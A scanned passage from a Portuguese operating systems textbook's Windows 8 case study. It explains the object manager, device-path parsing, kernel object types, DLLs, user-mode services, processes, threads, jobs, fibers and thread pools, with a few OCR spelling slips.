tórios de objetos deverá ser autoexplicativo. 

Como descrito anteriormente, o gerenciador de obje- 
tos mantém uma contagem de descritores separada em 
cada objeto. Essa contagem nunca é maior que a con- 
tagem de ponteiros referenciados porque cada descritor 
válido tem um ponteiro referenciado para o objeto em 
sua entrada na tabela de descritores. A razão para a conta- 
gem separada de descritores é que muitos tipos de objetos 
podem precisar ter seus estados limpos quando a última 
referência do modo usuário desaparece, mesmo que eles 
não estejam prontos para ter sua memória apagada. 

Um exemplo são os objetos de arquivo, que represen- 
tam uma instância de um arquivo aberto. No Windows, 
os arquivos podem ser abertos para acesso exclusivo. 
Quando o último descritor para um objeto de arquivo é 
fechado, é importante apagar o acesso exclusivo naque- 
le momento em vez de esperar pelo súbito desapareci- 
mento de qualquer referência acidental no núcleo (por 
exemplo, depois da última descarga de dados da memó- 
ria). De outra forma, fechar e reabrir um arquivo a partir 
do modo usuário pode não funcionar como esperado, 
pois o arquivo continua parecendo estar em uso. 


[FIGURA 11.19) Alguns diretórios típicos no espaço de nomes do objeto. 









































Diretório Conteúdo 
\?? Ponto de partida da pesquisa de dispositivos MS-DOS como C: 
\DosDevices Nome oficial do \??, mas na verdade só uma ligação simbólica para \?? 
\Device Todos os dispositivos de E/S descobertos 
\Driver Objetos correspondentes a cada driver de dispositivo carregado 
\ObjectTypes Os tipos de objetos como os listados na Figura 11.21 
Windows Objetos de envio de mensagens para todas as janelas de GUI do Win32 
\BaseNamedObjects Objetos do Win32 criados pelo usuario como semáforos, mutexes etc. 
\Arcname Nomes de partições descobertas pelo carregador de inicialização 
\NLS Objetos de Suporte de Linguagem Nacional 
\FileSystem Objetos de driver do sistema de arquivos e objetos reconhecedores do sistema de arquivos 
\Security Objetos pertencentes ao sistema de segurança 
\KnownDLLs Bibliotecas compartilhadas principais que sao abertas cedo e mantidas abertas 











Ainda que o gerenciador de objetos tenha mecanis- 
mos abrangentes para gerenciar o tempo de vida dos 
objetos no núcleo, nem as APIs do NT ou as APIs do 
Win32 oferecem um mecanismo de referência para li- 
dar com a utilização de múltiplos threads concorrentes 
no modo usuário. Assim, muitas aplicações multithread 
têm condições de corrida e defeitos de software quando 
vão fechar um descritor em um thread sem ter termina- 
do com ele em outro, fechar um descritor várias vezes 
ou fechar um descritor que outro thread ainda está usan- 
do e reabri-lo para referenciar um objeto diferente. 

Talvez as APIs do Windows devessem ter sido pro- 
jetadas para solicitar uma API de fechamento para cada 
objeto em vez de uma única operação genérica, NtClo- 
se. Isso teria ao menos reduzido a frequência de defei- 
tos causados por threads do modo usuário fechando os 
descritores errados. Outra solução podia ser embutir um 
campo de sequência em cada descritor além do índice 
na tabela de descritores. 

Para ajudar os desenvolvedores de aplicações a en- 
contrar problemas como esses em seus programas, o 
Windows tem um verificador de aplicações que os 
desenvolvedores de software podem baixar da Micro- 
soft. De maneira similar ao verificador para drivers que 
descreveremos na Seção 11.7, o verificador de aplica- 
ções faz uma extensa verificação de regras para ajudar 
os programadores a encontrar defeitos que podem não 
ser encontrados nos testes mais comuns. Ele também 
pode ativar uma ordenação FIFO para a lista de descri- 
tores livres, de modo que esses não sejam reutilizados 
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de imediato (ou seja, desativa a ordenação LIFO, de 
melhor desempenho, que normalmente é usada para ta- 
belas de descritores). Impedir que os descritores sejam 
reutilizados de forma rápida transforma as situações em 
que uma operação usa o descritor errado na utilização 
de um descritor fechado, que é mais fácil de detectar. 

O objeto de dispositivo é um dos mais importantes e 
versáteis objetos do modo núcleo no executivo. O tipo 
é especificado pelo gerenciador de E/S, que, junto com 
os drivers de dispositivos, são os usuários principais dos 
objetos de dispositivos. Estes últimos estão intimamen- 
te relacionados com os drivers, e cada objeto de disposi- 
tivo tem, de modo geral, uma ligação para um objeto de 
driver específico, que descreve como acessar as rotinas 
de processamento de E/S para o driver correspondente 
ao dispositivo. 

Objetos de dispositivos representam dispositivos 
de hardware, interfaces e barramentos, bem como par- 
tições lógicas de disco, volumes de disco e até siste- 
mas de arquivos e extensões do núcleo, como filtros 
antivírus. Muitos drivers de dispositivos são nomea- 
dos, para que possam ser acessados sem ter de abrir 
descritores para instâncias dos dispositivos, como no 
UNIX. Usaremos objetos de dispositivos para ilustrar 
como o procedimento Parse é usado, conforme exibi- 
do na Figura 11.20: 


1. Quando um componente do executivo, como o 
gerenciador de E/S implementando a chamada 
nativa de sistema NtCreateFile, chama ObOpe- 
nObjectByName no gerenciador de objetos, ele 
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passa um nome de caminho Unicode para 0 espa- 
ço de nomes do NT, digamos \??\C-\foo\bar. 

2. O gerenciador de objetos procura nos diretórios 
e ligações simbólicas e, por fim, descobre que 
\2??\C: se refere a um objeto de dispositivo (um 
tipo definido pelo gerenciador de E/S). O objeto 
de dispositivo é um nó folha na parte do espaço 
de nomes do NT gerenciada pelo gerenciador de 
objetos. 

3. O gerenciador de objetos chama, então, o proce- 
dimento Parse para esse tipo de objeto, que é o 
lopParseDevice implementado pelo gerenciador 
de E/S. Ele não passa apenas um ponteiro para 
o objeto de dispositivo que encontrou (para C:), 
mas também a cadeia de caracteres remanescen- 
te \foo\bar. 

4. O gerenciador de E/S vai criar um IRP (I/O 
Request Packet — pacote de solicitação de 
E/S), alocar um objeto de arquivo e enviar a so- 
licitação para a pilha de dispositivos de E/S de- 
terminada pelo objeto de dispositivo encontrado 
pelo gerenciador de objetos. 

5. O IRP percorre a pilha de E/S até alcançar um 
objeto de dispositivo representando a instância 
do sistema de arquivos para C:. Em cada estágio, 
o controle é passado para um ponto de entrada 
para o objeto de dispositivo associado ao obje- 
to de driver daquele nível. O ponto de entrada 
usado nesse caso é para operações do tipo CRE- 
ATE, uma vez que a solicitação é para criar ou 
abrir um arquivo chamado \foo\bar no volume. 

6. Os objetos de dispositivos encontrados à medi- 
da que o IRP caminha para o sistema de arqui- 
vos representam drivers de filtro de sistema de 
arquivos, que podem modificar a operação de 
E/S antes que chegue ao objeto de dispositivo 
do sistema de arquivos. De maneira usual, esses 
dispositivos intermediários representam exten- 
sões do sistema, como filtros antivírus. 

7. O objeto de dispositivo do sistema de arquivos 
tem uma ligação para o objeto de driver do sis- 
tema de arquivos, digamos o NTFS. Logo, o ob- 
jeto de driver contém o endereço da operação 
CREATE no NTFS. 

8. O NTFS vai preencher o objeto de arquivo e 
devolvê-lo para o gerenciador de E/S, que passa 
novamente por todos os dispositivos da pilha até 
que o lopParseDevice retorne ao gerenciador de 
objetos (veja a Seção 11.8). 

9. O gerenciador de objetos termina sua procura no 
espaço de nomes. Ele recebeu de volta um objeto 


inicializado da rotina Parse (que, nesse caso, é 
um objeto de arquivo — não o objeto de disposi- 
tivo original que ele encontrou). Logo, o geren- 
ciador de objetos cria um descritor para o objeto 
de arquivo na tabela de descritores do processo 
em curso e retorna o descritor para o chamador. 

10. A última etapa é voltar ao chamador no modo 
usuário, que nesse exemplo é a API Win32 
CreateFile, que devolverá o descritor para a 
aplicação. 


Os componentes do executivo podem criar novos 
tipos de forma dinâmica, chamando a interface ObCre- 
ateObjectType para o gerenciador de objetos. Não ha 
uma lista definitiva de tipos de objetos e eles mudam 
de uma versão para outra. Alguns dos mais comuns no 
Windows são listados na Figura 11.21. Vamos percorrer 
brevemente os tipos de objeto na figura. 

Os tipos processo e thread são óbvios. Há um ob- 
jeto para cada processo e cada thread, que contém as 
principais propriedades necessárias para gerenciar o 
processo ou o thread. Os três objetos seguintes, semá- 
foro, mutex e evento, todos lidam com sincronização 
entre processos. Os semáforos e os mutexes funcionam 
como esperado, mas com muitas características extras 
(por exemplo, valores máximos e timeouts). Os even- 
tos podem estar em um de dois estados: sinalizado ou 
não sinalizado. Se um thread espera por um evento que 
está sinalizado, ele é liberado imediatamente; se o even- 
to está em estado não sinalizado, ele bloqueia até que 
algum outro thread sinalize o evento, o que libera ou 
todos os threads bloqueados (eventos de notificação) 
ou apenas o primeiro (eventos de sincronização). Um 
evento também pode ser configurado para que, após um 
sinal ter sido aguardado com sucesso, ele se reverta, de 
maneira automática, para o estado de não sinalizado, em 
vez de permanecer no estado sinalizado. 

Os objetos de porta, temporizador e fila também es- 
tão relacionados com comunicação e sincronização. As 
portas são canais entre os processos para a troca de men- 
sagens LPC. Os temporizadores fornecem um modo de 
bloqueio por um intervalo de tempo específico. As filas 
(conhecidas internamente como KQUEUES) são usa- 
das para notificar os threads de que uma operação as- 
síncrona de E/S inicializada anteriormente foi concluída 
ou de que uma porta tem uma mensagem esperando. 
Elas são projetadas para gerenciar os níveis de concor- 
rência em uma aplicação e são usadas em aplicações 
de multiprocessadores de alto desempenho, como SQL. 

Objetos de arquivo aberto são criados quando um 
arquivo é aberto. Arquivos que não estão abertos não 
têm objetos gerenciados pelo gerenciador de objetos. 
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eitek Alguns tipos comuns de objetos gerenciados pelo gerenciador de objetos. 

















Tipo Descrição 
Processo Processo do usuário 
Thread Thread dentro de um processo 
Semáforo Semáforo com contador usado para sincronização entre processos 
Mutex Semáforo binário usado para entrar em uma região crítica 
Evento Objeto de sincronização com estado persistente (sinalizado/não) 





Porta de ALPC 


Mecanismo de envio de mensagem entre processos 





Temporizador 


Objeto que permite um thread adormecer por um intervalo de tempo fixo 





Fila Objeto usado para notificar a conclusão de E/S assíncrona 





Arquivo aberto 


Objeto associado a um arquivo aberto 





Token de acesso 


Descritor de segurança para algum objeto 











objetos 


Perfil Estrutura de dados usada na criação de perfis de uso da CPU 
Seção Objeto usado para representar arquivos mapeáveis 
Chave Chave de registro, usada para ligar o registro ao espaço de nomes do gerenciador de 





Diretório de objeto 


Diretório para agrupar os objetos dentro do gerenciador de objetos 





Ligação simbólica 


Refere-se a outro objeto do gerenciador de objetos por nome de caminho 





Dispositivo 


Objeto de dispositivo de E/S para um dispositivo físico, barramento ou instância de volume 





Driver de dispositivo 





Tokens de acesso são objetos de segurança; eles identi- 
ficam um usuário e dizem quais privilégios especiais o 
usuário possui (se os possuir). Perfis são estruturas usa- 
das para armazenar amostras periódicas do contador de 
programas de um thread em execução, para saber onde 
o programa está gastando seu tempo. 

Seções são usadas para representar objetos de me- 
mória que as aplicações podem pedir ao gerenciador de 
memória para serem mapeadas em seu espaço de ende- 
reçamento. Elas gravam a seção do arquivo (ou arquivo 
de página) que representa as páginas do objeto de me- 
mória quando elas estão no disco. As chaves represen- 
tam o ponto de montagem para o espaço de nomes do 
registro no espaço de nomes do gerenciador de objetos. 
Há, normalmente, apenas um objeto-chave, chamado 
\REGISTRY, que conecta os nomes das chaves do regis- 
tro e os valores ao espaço de nomes do NT. 

Diretórios de objeto e ligações simbólicas são locais 
à parte do espaço de nomes do NT administrados pelo 
gerenciador de objetos. Eles são similares aos seus cor- 
respondentes no sistema de arquivos: os diretórios per- 
mitem aos objetos relacionados serem mantidos juntos. 
Ligações simbólicas permitem a um nome em uma parte 
do espaço de nomes do objeto referenciar um objeto em 
uma parte diferente do espaço de nomes do objeto. 


Cada driver de dispositivo carregado tem seu próprio objeto 





Cada dispositivo conhecido pelo sistema operacio- 
nal tem um ou mais objetos de dispositivos que con- 
têm informações sobre eles e são usados pelo sistema 
para referenciar um dispositivo. Por fim, cada driver de 
dispositivo que tenha sido carregado tem um objeto de 
driver no espaço de objetos. Os objetos de driver são 
compartilhados por todos os objetos de dispositivos que 
representam instâncias dos dispositivos controlados por 
aqueles drivers. 

Outros objetos, não listados, têm propósitos mais es- 
pecializados, como interagir com transações de núcleo, 
ou a fábrica de threads operários do pool de threads 
do Win32. 


11.3.4 Subsistemas, DLLs e serviços do 
modo usuário 


Voltando à Figura 11.4, vemos que o sistema ope- 
racional Windows consiste em componentes no modo 
núcleo e componentes no modo usuário. Completamos, 
assim, nossa visão geral dos componentes do modo 
núcleo; logo, é hora de olhar para os componentes do 
modo usuário, dos quais há três tipos que são particu- 
larmente importantes para o Windows: subsistemas de 
ambiente, DLLs e processos de serviço. 
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Já descrevemos o modelo de subsistemas do Windows; 
não entraremos em mais detalhes além de mencionar 
que, no projeto original do NT, os subsistemas eram 
vistos como uma maneira de dar suporte a várias perso- 
nalidades de sistemas operacionais com o mesmo soft- 
ware de fundamento sendo executado no modo núcleo. 
Talvez essa tenha sido uma tentativa de evitar que sis- 
temas operacionais competissem pela mesma platafor- 
ma, como o VMS e o Berkeley UNIX fizeram no VAX 
da DEC; ou talvez ninguém na Microsoft soubesse se o 
OS/2 teria sucesso como uma interface de programação, 
e então estavam protegendo suas apostas. Em qualquer 
dos casos, o OS/2 tornou-se irrelevante e um recém- 
-chegado, a API do Win32, projetada para ser comparti- 
lhada com o Windows 95, passou a dominar. 

Um segundo aspecto-chave do projeto do modo 
usuário do Windows é a biblioteca de ligação dina- 
mica (DLL), que é código que é ligado a programas 
executáveis em tempo de execução ao invés vez de em 
tempo de compilação. As bibliotecas compartilhadas 
não são um conceito novo e a maior parte dos sistemas 
operacionais modernos as utiliza. No Windows, quase 
todas as bibliotecas são DLLs, desde a biblioteca de 
sistema ntdll.dil, que é carregada em todo processo, até 
as bibliotecas de alto nível de funções comuns que se 
destinam a permitir a reutilização de código por desen- 
volvedores de aplicações. 

As DLLs aumentam a eficiência do sistema permitin- 
do que código comum seja compartilhado entre proces- 
sos, reduzem os tempos de carregamento dos programas 
do disco, mantendo na memória os códigos usados com 
frequência, e aumentam a capacidade de manutenção do 
sistema, permitindo que o código de bibliotecas do sis- 
tema operacional seja atualizado sem ter de recompilar 
ou religar todos os programas que o utilizem. 

Por outro lado, bibliotecas compartilhadas apresen- 
tam o problema de versionamento e aumentam a com- 
plexidade do sistema, porque mudanças introduzidas em 
uma biblioteca compartilhada para ajudar um programa 
em particular têm o potencial de expor erros latentes em 
outras aplicações, ou apenas quebrá-las em virtude das 
mudanças na implementação — um problema que, no 
mundo do Windows, é referido como inferno da DLL. 

A implementação das DLLs é simples no conceito. 
No lugar de o compilador emitir um código que chama, 
de forma direta, sub-rotinas na mesma imagem executá- 
vel, um nivel de indireção é introduzido: a IAT (Import 
Address Table — Tabela de endereços de importação). 
Quando um executável é carregado, pesquisa-se nele 
sobre a lista de DLLs que também têm de ser carregadas 
(em geral um grafo, já que as DLLs listadas geralmente 


listam outras DLLs necessárias para sua execução). As 
DLLs solicitadas são carregadas e a IAT é preenchida 
para todas. 

A realidade é mais complicada. Outro problema é 
que os grafos que representam as relações entre as 
DLLs podem conter ciclos ou ter comportamentos não 
determinísticos; logo, calcular a lista de DLLs para car- 
regar pode resultar em uma sequência que não funcione. 
Além disso, no Windows, as bibliotecas DLL são auto- 
rizadas a executar códigos sempre que são carregadas 
para um processo, ou quando um novo thread é cria- 
do. De modo geral, isso é para que elas possam realizar a 
inicialização, ou alocar armazenamento para cada thread, 
mas muitas DLLs realizam muitos cálculos nessas ro- 
tinas de anexação. Se qualquer uma das funções cha- 
madas em uma rotina de anexação precisar examinar a 
lista de DLLs carregadas, pode ocorrer um impasse que 
trava o processo. 

As DLLs são usadas para mais do que apenas com- 
partilhar códigos comuns. Elas habilitam um modelo 
de hospedagem para estender as aplicações. O Inter- 
net Explorer pode baixar, e se ligar a DLLs chamadas 
controles ActiveX. Na outra ponta da internet, servi- 
dores da web também carregam código dinâmico para 
produzir uma experiência web melhor para as páginas 
que eles exibem. Aplicações como o Microsoft Office 
são ligadas e executam DLLs para permitir que o Offi- 
ce seja usado como uma plataforma para a construção 
de outras aplicações. O estilo de programação COM 
(Component Object Model — modelo de objeto com- 
ponente) permite aos programas encontrar e carregar, 
de modo dinâmico, código escrito para fornecer uma 
interface publicada específica, que leva à hospedagem 
de DLLs em processos por quase todas as aplicações 
que usam COM. 

Todo esse carregamento dinâmico de código resul- 
tou em uma complexidade ainda maior para o sistema 
operacional, já que o gerenciamento de versões de bi- 
blioteca não é apenas uma questão de combinar um exe- 
cutável com as versões certas das DLLs, mas em alguns 
casos carregar várias versões da mesma DLL para um 
processo — o que a Microsoft chama de lado a lado. 
Um único programa pode hospedar duas bibliotecas de 
códigos dinâmicos diferentes, e cada uma pode querer 
carregar a mesma biblioteca do Windows — mas ter re- 
quisitos de versões diferentes para essa biblioteca. 

Uma solução melhor seria hospedar código em pro- 
cessos separados, mas a hospedagem de código fora dos 
processos resulta em desempenho mais baixo e implica 
modelos de programação mais complicados em mui- 
tos casos. A Microsoft ainda não desenvolveu uma boa 


solução para toda essa complexidade no modo usuário. 
Isso faz com que alguém anseie pela relativa simplici- 
dade do modo núcleo. 

Uma das razões para o modo núcleo ter menos com- 
plexidade que o modo usuário é que ele dá suporte a 
poucas oportunidades de extensão fora do modelo do 
driver de dispositivo. No Windows, a funcionalidade do 
sistema é estendida escrevendo serviços do modo usuá- 
rio. Isso funcionou bem para os subsistemas e funciona 
ainda melhor quando apenas poucos serviços novos es- 
tão sendo oferecidos, ao contrário de uma personalidade 
completa do sistema operacional. Há poucas diferenças 
funcionais entre os serviços implementados no núcleo e 
os serviços implementados nos processos do modo usu- 
ário. Tanto o núcleo quanto os processos oferecem es- 
paços de endereçamento privados onde as estruturas de 
dados podem ser protegidas e as solicitações de serviços 
podem ser bem examinadas. 

Entretanto, pode haver diferenças significativas de 
desempenho entre os serviços no núcleo contra os servi- 
ços nos processos do modo usuário. Entrar no núcleo a 
partir do modo usuário é lento nos hardwares modernos, 
mas não tão lento quanto ter de fazê-lo duas vezes por- 
que se está chaveando e voltando para outro processo. 
Além disso, a comunicação pelos processos tem uma 
largura de banda menor. 

O código no modo núcleo pode (com muito cuidado) 
acessar dados nos endereços do modo usuário passados 
como parâmetros para suas chamadas de sistema. Com 
os serviços do modo usuário, ou esses dados devem ser 
copiados para o processo do serviço, ou se deve reali- 
zar um jogo de mapeamento da memória para lá e para 
cá (os recursos de ALPC no Windows tratam disso por 
baixo dos panos). 

É possível que, no futuro, os custos de hardware do 
cruzamento entre espaços de endereçamento e modos de 
proteção sejam reduzidos, ou talvez até se tornem irrele- 
vantes. O projeto Singularidade da Microsoft Research 
(FANDRICH et al., 2006) usa técnicas de tempo de exe- 
cução, como as utilizadas em C# e Java, para tornar a 
proteção uma questão exclusiva do software. Não são 
necessários chaveamentos em hardware entre espaços de 
endereçamento ou modos de proteção. 

O Windows faz uso significativo de processos de 
serviços do modo usuário para estender a funcionali- 
dade do sistema. Alguns desses serviços são fortemente 
ligados ao funcionamento dos componentes do modo 
núcleo, como o /sass.exe, que é o serviço de autentica- 
ção de segurança local, que gerencia os objetos de token 
que representam a identidade do usuário, bem como as 
chaves de codificação usadas pelo sistema de arqui- 
vos. O gerenciador de recursos plug-and-play do modo 
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usuário é responsável por determinar o driver correto a 
ser utilizado quando um novo dispositivo de hardware é 
encontrado, instalá-lo e dizer ao núcleo para carregá-lo. 
Muitos recursos oferecidos por terceiros, como geren- 
ciamento de antivírus e direitos digitais, são implemen- 
tados como uma combinação de drivers do modo núcleo 
e serviços do modo usuário. 

No Windows, o taskmgr.exe tem uma aba que iden- 
tifica os serviços em execução no sistema. Vários ser- 
viços podem ser vistos executando no mesmo processo 
(svchost.exe). O Windows faz isso em muitos de seus 
próprios serviços de inicialização para reduzir o tempo 
necessário para inicializar o sistema. Os serviços podem 
ser combinados no mesmo processo desde que possam 
operar de maneira segura com as mesmas credenciais 
de segurança. 

Dentro de cada um dos processos compartilhados 
de serviço, serviços individuais são carregados como 
DLLs. Eles, de modo geral, compartilham um pool de 
threads usando o recurso de pool de threads do Win32, 
de modo que apenas um número mínimo de threads pre- 
cise estar em execução por todos os serviços residentes. 

Os serviços são fontes comuns de vulnerabilidades 
de segurança no sistema porque são, de modo geral, 
acessíveis remotamente (dependendo do firewall do 
TCP/IP e configurações de segurança de IP), e nem to- 
dos os programadores que escrevem serviços são cui- 
dadosos como deveriam para validar os parâmetros e 
buffers que são passados pelas RPCs. 

O número de serviços sendo executados de maneira 
constante no Windows é impressionante. No entanto, 
alguns deles nunca recebem uma única solicitação e, 
quando o fazem, é provável que seja de um atacante ten- 
tando explorar uma vulnerabilidade. Como resultado, 
mais e mais serviços no Windows são desativados por 
padrão, em especial nas versões do Windows Server. 


11.4 Processos e threads no Windows 


O Windows tem uma série de conceitos para geren- 
ciar a CPU e agrupar os recursos. Nas próximas seções 
examinaremos esses conceitos, discutindo algumas das 
chamadas relevantes da API do Win32, e mostraremos 
como são implementados. 


11.4.1 Conceitos fundamentais 


No Windows os processos são contêineres para pro- 
gramas. Eles detêm o espaço de endereçamento virtual, 
os descritores que fazem referência aos objetos do modo 
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nucleo e os threads. Em seu papel de contéiner de 
threads, eles detém recursos comuns usados para execu- 
ção de threads, como o ponteiro para a estrutura de cota, o 
objeto de token compartilhado e parâmetros-padrão usados 
para inicializar os threads — incluindo a classe de escalo- 
namento e prioridade. Cada processo tem dados de sistema 
do modo usuário, chamados PEB (Process Environment 
Block — bloco do ambiente do processo). O PEB inclui a 
lista de módulos carregados (ou seja, o EXE e as DLLs), a 
memória contendo string de ambiente, o diretório de traba- 
lho atual e os dados para gerenciar as heaps dos processos 
— assim como vários casos especiais de códigos inúteis do 
Win32 que foram adicionados ao longo do tempo. 

Os threads são a abstração do núcleo para escalonar a 
CPU no Windows. Prioridades são atribuídas para cada 
thread com base no valor da prioridade no processo que 
o contém. Eles também podem ter afinidade para serem 
executados apenas em certos processadores, o que ajuda 
programas concorrentes sendo executados em multipro- 
cessadores a distribuir de forma explícita um trabalho. 
Cada thread tem duas pilhas separadas de chamadas, uma 
para execução no modo usuário e outra para o modo nú- 
cleo; há também um TEB (Thread Environment Block 
— bloco de ambiente de thread) que mantém os dados 
do modo usuário específicos ao thread, incluindo arma- 
zenamento por thread (armazenamento local de thread 
— thread local storage) e campos para o Win32, lin- 
guagem e localização cultural, e outros campos especia- 
lizados que foram adicionados por vários outros recursos. 

Além dos PEBs e TEBs, há uma outra estrutura de da- 
dos que o modo núcleo compartilha com cada processo, 
chamada de dados compartilhados do usuário. Ela é 
uma página que pode ser escrita pelo núcleo, mas é so- 
mente leitura em todo processo do modo usuário. Contém 
uma série de valores mantidos pelo núcleo, como vários 
formatos de hora, informação da versão, quantidade de 
memória física e muitos flags compartilhados usadas por 
inúmeros componentes do modo usuário, como COM, 
serviços de terminal e depuradores. O uso dessa página 
somente leitura é apenas um aperfeiçoamento de desem- 
penho, já que os valores também poderiam ser obtidos 
por uma chamada de sistema para o modo núcleo, mas as 
chamadas de sistema são muito mais caras que um único 
acesso de memória; logo, para alguns campos mantidos 
pelo sistema, como a hora, faz muito sentido. Os outros 
campos, como o fuso horário atual, não mudam com fre- 
quência (exceto em computadores em aeronaves), mas o 
código que reside nesses campos deve consultá-los re- 
petidas vezes apenas para ver se mudaram. Assim como 
em muitas modificações para melhorar o desempenho, é 
estranho, mas funciona. 


Processos 


Os processos são criados por objetos de seção, cada 
um dos quais descreve um objeto de memória mantido 
em um arquivo no disco. Quando um processo é criado, 
o processo criador recebe um descritor para esse pro- 
cesso que lhe permite modificá-lo mapeando seções, 
alocando memória virtual, gravando parâmetros e da- 
dos de ambiente, duplicando descritores de arquivo em 
sua tabela de descritores e criando threads. Isso é muito 
diferente de como os processos são criados no UNIX 
e reflete a diferença entre os sistemas pretendidos nos 
projetos originais do UNIX versus Windows. 

Como descrito na Seção 11.1, o UNIX foi projetado 
para sistemas de apenas um processador de 16 bits que 
usavam o sistema de troca (swapping) para comparti- 
lhar a memória entre os processos. Em tais sistemas, ter 
o processo como a unidade de concorrência e usar uma 
operação como fork para criar processos era uma ideia 
brilhante. Para executar um novo processo com pouca 
memória e nenhum hardware de memória virtual, os pro- 
cessos na memória têm de ser trocados para o disco para 
criar espaço. O UNIX implementou fork no início apenas 
trocando os processos pais e passando sua memória física 
para os filhos. A operação quase não tinha custo. 

Em contrapartida, o ambiente de hardware no mo- 
mento em que a equipe de Cutler escreveu o NT eram 
sistemas de multiprocessadores de 32 bits com hardware 
de memória virtual para compartilhar 1-16 MB de me- 
mória física. Os multiprocessadores oferecem a opor- 
tunidade de executar partes de programas de forma 
concorrente, então o NT usava processos como con- 
têineres para compartilhar memória e objeto, e empre- 
gava threads como a unidade de concorrência para o 
escalonamento. 

É lógico, os sistemas dentro de poucos anos não vão 
mais se parecer em nada com nenhum desses dois am- 
bientes, tendo espaços de endereçamento de 64 bits com 
dezenas (ou centenas) de núcleos de CPU por soquete 
de chip e dezenas ou centenas de GB de memória física. 
Essa memória também poderá ser radicalmente diferente 
da RAM atual. A RAM atual perde seu conteúdo quan- 
do não é alimentada com energia, mas as memórias de 
mudança de fase, agora em estudo, mantêm seus valores 
(como os discos) mesmo quando a energia é desligada. 
Também podemos esperar dispositivos flash substituin- 
do os discos rígidos, suporte mais amplo à virtualização, 
redes onipresentes e suporte para inovações de sincro- 
nização, como memória transacional. O Windows e o 
UNIX continuarão a ser adaptados a novas realidades de 
hardware, mas o que será mesmo interessante é ver quais 


novos sistemas operacionais são projetados de forma es- 
pecífica para sistemas baseados nesses avanços. 


Tarefas e filamentos 


O Windows pode agrupar processos em tarefas. 
Tarefas agrupam processos com o objetivo de aplicar 
restrições a eles e aos threads que eles contêm, como li- 
mitar o uso de recursos por meio de cota compartilhada 
ou aplicar um token restrito que impede que os threads 
acessem muitos objetos de sistema. A propriedade mais 
significativa das tarefas para o gerenciamento de re- 
cursos é que, uma vez que um processo esteja em uma 
tarefa, todos os threads dos processos que esse proces- 
so cria também estarão na tarefa. Não há como fugir. 
Como indicado pelo nome, as tarefas foram projetadas 
para situações que são mais semelhantes ao processa- 
mento em lote do que à computação interativa comum. 

No Windows Moderno, as tarefas são usadas para 
agrupar os processos que estão executando uma apli- 
cação moderna. Os processos que compreendem uma 
aplicação em execução precisam ser identificados ao 
sistema operacional, para que este possa gerenciar a 
aplicação inteira em favor do usuário. 

A Figura 11.22 apresenta o relacionamento entre ta- 
refas, processos, threads e filamentos. As tarefas contêm 
processos; processos contêm threads, mas os threads não 
contêm filamentos. O relacionamento de threads com fi- 
lamentos é, de modo geral, de muitos para muitos. 

Os filamentos são criados alocando-se uma pilha e 
uma estrutura de dados de filamento do modo usuário 
para armazenar registradores e dados associados com 
o filamento. Os threads são convertidos em filamentos, 
mas estes podem também ser criados de modo indepen- 
dente dos threads. Esses filamentos não serão executa- 
dos até que algum que já esteja sendo executado em um 
thread chame, de forma explícita, SwitchToFiber para 
executá-lo. Os threads poderiam tentar trocar para um 


Capítulo 11 ESTUDO DE CASO 2: WINDOWS 8 | 631] 


filamento já em execução, logo o programador deve 
fornecer sincronização para impedir isso. 

A principal vantagem dos filamentos é que o custo 
adicional da troca entre filamentos é muito mais baixo 
que o da troca entre threads. Uma troca de thread requer 
entrada e saída no núcleo. Uma troca de filamento grava 
e recupera alguns registradores sem qualquer mudança 
de modos. 

Ainda que os filamentos sejam escalonados de for- 
ma cooperativa, se há muitos threads escalonando os 
filamentos, muita sincronização cautelosa é necessária 
para assegurar que os filamentos não interfiram uns 
nos outros. Para simplificar a interação entre threads 
e filamentos, é útil criar apenas tantos threads quantos 
forem os processadores para executá-los e configurar 
a afinidade dos threads para que cada um seja executa- 
do apenas em um conjunto específico de processadores 
disponíveis, ou até mesmo em apenas um processador. 

Cada thread pode, então, executar um subconjunto par- 
ticular de filamentos, estabelecendo um relacionamento 
um para muitos entre os threads e filamentos, o que sim- 
plifica a sincronização. Mesmo assim, ainda há muitas di- 
ficuldades com os filamentos. A maioria das bibliotecas do 
Win32 desconhece os filamentos, e as aplicações que ten- 
tam utilizá-los como se fossem threads encontrarão muitas 
falhas. O núcleo não tem conhecimento dos filamentos e, 
quando um entra no núcleo, o thread em que está sendo 
executado pode se bloqueado e o núcleo vai escalonar um 
thread arbitrário para o processador, tornando-o indispo- 
nível para executar outros filamentos. Por essas razões os 
filamentos são pouco usados, exceto quando se transporta 
código de outros sistemas que precisem de forma explícita 
das funcionalidades oferecidas por eles. 


Pools de threads e escalonamento no modo usuário 


O pool de threads do Win32 é um recurso que se 
encontra no topo do modelo de threads do Windows, 
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para oferecer uma melhor abstração para certos tipos 
de programas. A criação de threads é muito dispendio- 
sa para ser invocada toda vez que um programa quer 
executar uma tarefa pequena simultaneamente com 
outras tarefas, a fim de tirar proveito dos diversos pro- 
cessadores. As tarefas podem ser agrupadas em tarefas 
maiores, mas isso reduz a quantidade de concorrência 
explorável no programa. Uma abordagem alternativa 
é que um programa reserve um número limitado de 
threads e mantenha uma fila de tarefas que precisem 
ser executadas. À medida que um thread termina de 
executar uma tarefa, ele pega outra na fila. Esse mo- 
delo separa as questões de gerenciamento de recursos 
(quantos processadores estão disponíveis e quantos 
threads devem ser criados) do modelo de programação 
(o que é uma tarefa e como as tarefas são sincroniza- 
das). O Windows formaliza essa solução no pool de 
threads da Win32, um conjunto de APIs para gerenciar 
automaticamente um pool dinâmico de threads e des- 
pachar tarefas a eles. 

Mas os pools de threads não são uma solução per- 
feita, pois quando um thread é bloqueado por algum 
recurso no meio de uma tarefa, ele não pode alternar 
para uma tarefa diferente. Assim, o pool de threads 
inevitavelmente criará mais threads do que o número 
de processadores disponíveis; assim, se puderem ser 
executados, os threads estarão disponíveis para serem 
escalonados mesmo quando outros threads tiverem 
sido bloqueados. O pool de threads é integrado a mui- 
tos dos mecanismos comuns de sincronização, como 
aguardar o término da E/S ou ficar bloqueado até que 
um evento do núcleo seja sinalizado. A sincronização 
pode ser usada como gatilho para o enfileiramento 
de uma tarefa, para que os threads não tenham uma 
tarefa atribuída antes que ela esteja pronta para ser 
executada. 

A implementação do pool de threads utiliza o mesmo 
recurso de fila fornecido para a sincronização com o tér- 
mino da E/S, junto com uma fábrica de threads do modo 
núcleo que adiciona mais threads ao processo quando 
for preciso manter os processadores disponíveis ocu- 
pados. Existem tarefas pequenas em muitas aplicações, 
mas particularmente naquelas que oferecem serviços 
no modelo de computação cliente/servidor, onde uma 
enxurrada de solicitações é enviada dos clientes para o 
servidor. O uso de um pool de threads para esses cená- 
rios aumenta a eficiência do sistema, reduzindo o custo 
adicional de criar threads e passando as decisões sobre 
